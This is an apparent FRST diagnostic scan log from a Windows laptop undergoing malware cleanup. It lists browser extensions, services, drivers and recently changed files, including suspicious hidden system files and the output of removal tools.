CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-15]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed]
R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited)
S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> )
R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.)
R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft)
R3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. ->  )
R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.)
R2 RIM Tunnel Service; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe [1355000 2015-05-26] (BlackBerry Ltd. -> BlackBerry Limited)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246872 2017-11-17] (Synaptics Incorporated -> Synaptics Incorporated)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 Accelerometer; C:\Windows\system32\DRIVERS\Accelerometer.sys [43840 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
R3 AgereSoftModem; C:\Windows\system32\DRIVERS\agrsm64.sys [1230104 2015-08-05] (Microsoft Windows Hardware Compatibility Publisher -> LSI Corporation)
S3 androidusb; C:\Windows\System32\Drivers\wsadb.sys [38008 2017-11-10] (Anvsoft Inc. -> Google Inc)
S3 blackberryncm; C:\Windows\system32\DRIVERS\blackberryncm6_AMD64.sys [25600 2015-01-23] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 btwavdt; C:\Windows\system32\DRIVERS\btwavdt.sys [230656 2015-03-13] (Broadcom Corporation -> Broadcom Corporation.)
S3 BTWUSB; C:\Windows\System32\Drivers\btwusb.sys [66136 2015-11-25] (Broadcom Corporation -> Broadcom Corporation.)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 e1cexpress; C:\Windows\system32\DRIVERS\e1c64x64.sys [468752 2014-07-29] (Intel Corporation -> Intel Corporation)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
R0 hpdskflt; C:\Windows\System32\DRIVERS\hpdskflt.sys [31040 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
S3 hwdatacard; C:\Windows\system32\DRIVERS\ewusbmdm.sys [116864 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
S3 Netaapl; C:\Windows\system32\DRIVERS\netaapl64.sys [23040 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3349984 2014-03-08] (Intel Corporation-Mobile Wireless Group -> Intel Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [80384 2015-01-14] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 rimvndis; C:\Windows\System32\Drivers\rimvndis6_AMD64.sys [18432 2015-05-26] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 RimVSerPort; C:\Windows\system32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Research in Motion Ltd)
R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv64.sys [749824 2017-11-27] (Sunplus Innovation Technology Inc. -> Sunplus Innovation Technology Inc.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-16 09:55 - 2019-02-16 09:55 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-02-16 07:59 - 2019-02-16 07:59 - 000002719 _____ C:\Users\Stanley\Desktop\JRT.txt
2019-02-16 07:45 - 2019-02-16 07:53 - 000001638 _____ C:\Users\Stanley\Desktop\Rkill.txt
2019-02-16 07:45 - 2019-02-16 07:45 - 000000000 ____D C:\Users\Stanley\Desktop\rkill
2019-02-16 07:38 - 2019-02-16 07:44 - 000696026 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.38.18_log.txt
2019-02-16 07:35 - 2019-02-16 07:36 - 000004670 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.35.18_log.txt
2019-02-16 07:31 - 2019-02-16 07:31 - 000004416 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.31.06_log.txt
2019-02-16 07:23 - 2019-02-16 07:26 - 000000000 ____D C:\AdwCleaner
2019-02-15 02:09 - 2019-02-15 02:10 - 000002383 _____ C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk
2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk
2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk
2019-02-15 02:08 - 2019-02-15 02:08 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk
2019-02-15 00:32 - 2019-02-15 00:32 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbam
2019-02-15 00:31 - 2019-02-15 00:31 - 000001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-15 00:31 - 2019-02-15 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbamtray
2019-02-15 00:30 - 2019-02-15 00:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-15 00:30 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-02-14 02:41 - 2019-02-16 09:02 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\uTorrent
2019-02-13 22:08 - 2019-02-14 02:40 - 000000414 _____ C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job
2019-02-13 22:08 - 2019-02-13 22:08 - 000003256 _____ C:\Windows\System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\taskshostservices.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmonfs.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmon.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\taskshostservices.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\mssecsvc.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SysWOW64\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\system32\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SpeechsTracing
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\AppDiagnostics
2019-02-12 18:32 - 2019-02-13 14:18 - 000000000 ____D C:\Program Files (x86)\SMADAV
2019-02-12 18:32 - 2019-02-13 05:55 - 000000000 __SHD C:\[Smad-Cage]
2019-02-12 18:32 - 2019-02-12 18:32 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Smadav
2019-02-12 18:31 - 2019-02-12 18:31 - 001698648 _____ (Smadsoft ) C:\Users\Stanley\Downloads\smadav2019rev126.exe
2019-02-12 18:05 - 2019-02-12 18:06 - 064531912 _____ (Malwarebytes ) C:\Users\Stanley\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9208.exe
2019-02-12 17:43 - 2019-02-16 09:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC Browser
2019-02-12 05:59 - 2019-02-12 05:59 - 000104160 _____ C:\Users\Stanley\Downloads\Shortcut.txt
2019-02-12 05:53 - 2019-02-18 01:25 - 000000000 ____D C:\Users\Stanley\Downloads\FRST
2019-02-12 05:33 - 2019-02-18 01:24 - 000000000 ____D C:\FRST
2019-02-10 21:40 - 2019-02-10 21:40 - 000001483 _____ C:\Users\Stanley\Desktop\iexplore.exe - Shortcut.lnk
2019-02-10 07:29 - 2019-02-10 07:34 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-500
2019-02-10 07:28 - 2019-02-10 07:28 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 20:12 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Apple Computer
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\OpenVPN
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Apple Computer
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Packages
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator
2019-02-10 07:24 - 2019-02-10 07:24 - 000001442 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-02-10 07:24 - 2019-02-10 07:24 - 000000020 ___SH C:\Users\Administrator\ntuser.ini
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Local\Google
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-02-09 02:21 - 2019-02-09 02:21 - 000000000 ____D C:\Windows\pss
2019-02-09 01:24 - 2019-02-09 01:24 - 000000146 _____ C:\Users\Stanley\Desktop\Windows Defender - Shortcut.lnk
2019-02-08 22:53 - 2019-02-08 22:56 - 007406936 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-02-08 22:53 - 2019-02-08 22:56 - 001536112 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2019-02-08 22:53 - 2019-02-08 22:53 - 000000000 ____D C:\Users\#Strazzo.RoseGold##
2019-02-07 05:47 - 2019-02-07 05:47 - 000001178 _____ C:\Users\Public\Desktop\PhoneRescue.lnk
2019-02-07 05:40 - 2019-02-07 08:03 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Decipher Media
2019-02-07 05:25 - 2019-02-07 05:36 - 045726776 _____ (Decipher Media) C:\Users\Stanley\Downloads\DecipherBackupRepair.exe
2019-02-07 04:32 - 2019-02-07 04:39 - 040754877 _____ (iMacTools ) C:\Users\Stanley\Downloads\iBackupViewerSetup.exe
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\iBackup Viewer
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\CrashRpt
2019-02-07 03:11 - 2019-02-07 03:11 - 000000000 ____D C:\Users\Stanley\Documents\Apowersoft
2019-02-07 03:10 - 2019-02-07 03:10 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apowersoft
2019-02-07 02:04 - 2019-02-07 02:04 - 000000000 ____D C:\Users\Stanley\AppData\Local\Reincubate Temporary Files
2019-02-06 20:03 - 2019-02-06 20:06 - 006258864 _____ (iMobie Inc. ) C:\Users\Stanley\Downloads\phonebrowse-64-setup.exe
2019-02-06 19:48 - 2019-02-06 19:54 - 021424360 _____ (Reincubate Ltd) C:\Users\Stanley\Downloads\iphonebackupextractor-latest.exe
2019-02-06 05:53 - 2019-02-15 01:38 - 000000000 ____D C:\Users\Stanley\Downloads\MM_VideoDownload
2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobiMoverUI
2019-02-06 05:30 - 2019-02-06 05:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\SystemAcCrux
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\WindSolutions
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\ProgramData\WindSolutions
2019-02-06 04:46 - 2019-02-06 04:46 - 000000000 ____D C:\Users\Stanley\AppData\Local\FoneDog
2019-02-06 04:26 - 2019-02-06 04:27 - 008046792 _____ (WindSolutions) C:\Users\Stanley\Downloads\Install_CopyTransControlCenter.exe
2019-02-06 04:23 - 2019-02-06 04:23 - 000000000 ____D C:\Users\Stanley\AppData\Local\Aiseesoft Studio
2019-02-05 11:35 - 2019-02-06 04:26 - 030804013 _____ (FoneDog ) C:\Users\Stanley\Downloads\fonedog-ios-toolkit.exe
2019-02-05 11:35 - 2019-02-05 11:35 - 000001133 _____ C:\Users\Stanley\Desktop\Syncios.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002343 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002331 _____ C:\Users\Public\Desktop\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\Program Files (x86)\Syncios Data Recovery
2019-02-05 01:46 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple Computer
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\Documents\Wondershare
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobileBackupForeverIni
2019-02-05 00:50 - 2019-02-05 00:50 - 000000000 ____D C:\Users\Stanley\AppData\Local\AdvinstAnalytics
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ C:\Users\Stanley\AppData\Local\installer.dat
2019-02-05 00:31 - 2019-02-05 01:39 - 000000000 ____D C:\Users\Stanley\AppData\Local\Deployment
2019-02-05 00:31 - 2019-02-05 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\Apps\2.0
2019-02-04 23:57 - 2019-02-04 23:57 - 000000000 ____D C:\Users\Stanley\AppData\Local\DigiDNA
2019-02-04 23:54 - 2019-02-05 00:05 - 112497792 _____ C:\Users\Stanley\Downloads\setup_syncios (1).exe
2019-02-04 22:32 - 2019-02-04 22:32 - 000000000 ____D C:\Users\RoseGold\Documents\Syncios
2019-02-02 10:43 - 2019-02-02 10:43 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple
2019-01-31 12:39 - 2019-01-31 12:39 - 000048210 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-23 at 1.56.07 PM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM (1).jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000046824 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-20 at 8.50.51 PM.jpeg
2019-01-31 10:17 - 2019-01-31 10:17 - 000046880 _____ C:\Users\Stanley\Downloads\usd slip1.jpeg
2019-01-30 07:56 - 2019-02-10 07:34 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1004
2019-01-30 07:52 - 2019-01-31 06:21 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\hpqlog
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Apple Computer
2019-01-30 07:51 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\.android
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios Data Transfer
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\SyncDroid
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Research In Motion
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\BlackBerry
2019-01-30 07:48 - 2019-02-12 06:38 - 000001446 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-30 07:48 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Packages
2019-01-30 07:48 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold
2019-01-30 07:48 - 2019-01-30 07:48 - 000000020 ___SH C:\Users\RoseGold\ntuser.ini
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Adobe
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\VirtualStore
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Google
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-01-27 09:06 - 2019-01-27 09:06 - 000202698 _____ C:\Users\Stanley\Downloads\114328 (1).pdf
2019-01-27 08:22 - 2019-01-27 08:22 - 000202698 _____ C:\Users\Stanley\Downloads\114328.pdf
2019-01-26 22:39 - 2019-01-26 22:39 - 000001160 _____ C:\Users\Stanley\Downloads\converted_1082592538.txt
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ___HD C:\OneDriveTemp
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ____D C:\Users\Stanley\OneDrive
2019-01-26 14:55 - 2019-01-26 14:55 - 000075241 _____ C:\Users\Stanley\Downloads\newocr.com-20190126135542.pdf
2019-01-26 14:01 - 2019-01-26 14:01 - 000351579 _____ C:\Users\Stanley\Downloads\001 (2).pdf
2019-01-26 13:59 - 2019-01-26 13:59 - 000315587 _____ C:\Users\Stanley\Downloads\001 (1).pdf
2019-01-26 13:53 - 2019-01-26 13:53 - 000271265 _____ C:\Users\Stanley\Downloads\topdf.zip
2019-01-26 13:53 - 2019-01-26 13:52 - 000315587 _____ C:\Users\Stanley\Downloads\001.pdf
2019-01-26 06:02 - 2019-01-26 06:02 - 000001759 _____ C:\Users\Public\Desktop\iTunes.lnk
2019-01-26 06:02 - 2019-01-26 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2019-01-26 06:01 - 2019-01-26 06:01 - 000000000 ____D C:\Program Files\iPod
2019-01-26 06:00 - 2019-01-26 06:02 - 000000000 ____D C:\Program Files\iTunes
2019-01-26 05:48 - 2019-01-26 05:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2019-01-22 12:20 - 2019-01-22 12:21 - 000860720 _____ C:\Users\Stanley\Downloads\Ηλεκτρολογικός εξοπλισμός.2016714105916.xlsx
2019-01-21 12:46 - 2019-01-21 12:46 - 003864349 _____ C:\Users\Stanley\Downloads\GPP002-Schneider-Ersatzteile (1).xlsx
2019-01-21 09:17 - 2019-01-21 09:17 - 000215164 _____ C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI222.srt
2019-01-21 02:12 - 2018-12-14 15:23 - 000107584 ____N C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI.srt
2019-01-21 02:09 - 2019-01-21 09:18 - 000039742 _____ C:\Users\Stanley\Downloads\hunter_killer_english_1340435.zip
2019-01-19 16:06 - 2019-02-10 22:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monopoly Here & Now Edition
2019-01-19 16:06 - 2019-01-19 16:06 - 000000000 ____D C:\ProgramData\TEMP
2019-01-19 16:02 - 2019-01-19 16:03 - 015141368 _____ C:\Users\Stanley\Downloads\MonopolyHNSetup.exe

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-18 01:27 - 2018-05-12 16:21 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent
2019-02-18 01:21 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2019-02-17 07:59 - 2018-06-03 09:29 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\vlc
2019-02-16 10:34 - 2018-05-03 17:58 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1001
2019-02-16 09:05 - 2014-11-22 04:09 - 000176404 _____ C:\Windows\system32\PerfStringBackup.INI
2019-02-16 09:02 - 2018-12-27 19:56 - 000000000 ___RD C:\Users\Stanley\iCloudDrive
2019-02-16 09:00 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-02-16 08:59 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DMCache
2019-02-16 07:54 - 2018-05-12 16:22 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Lavasoft
2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\ProgramData\Lavasoft
2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-02-16 07:32 - 2013-08-22 14:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2019-02-16 06:09 - 2018-05-09 14:30 - 000507392 ___SH C:\Users\Stanley\Downloads\Thumbs.db
2019-02-16 05:57 - 2018-05-04 17:06 - 000003842 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1525449700
2019-02-16 05:57 - 2018-05-04 17:01 - 000001050 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2019-02-16 05:57 - 2018-05-04 17:00 - 000000000 ____D C:\Program Files\Opera
2019-02-15 01:31 - 2018-05-04 07:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DriverPack Easy Search
2019-02-15 00:15 - 2018-06-24 08:33 - 000002320 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
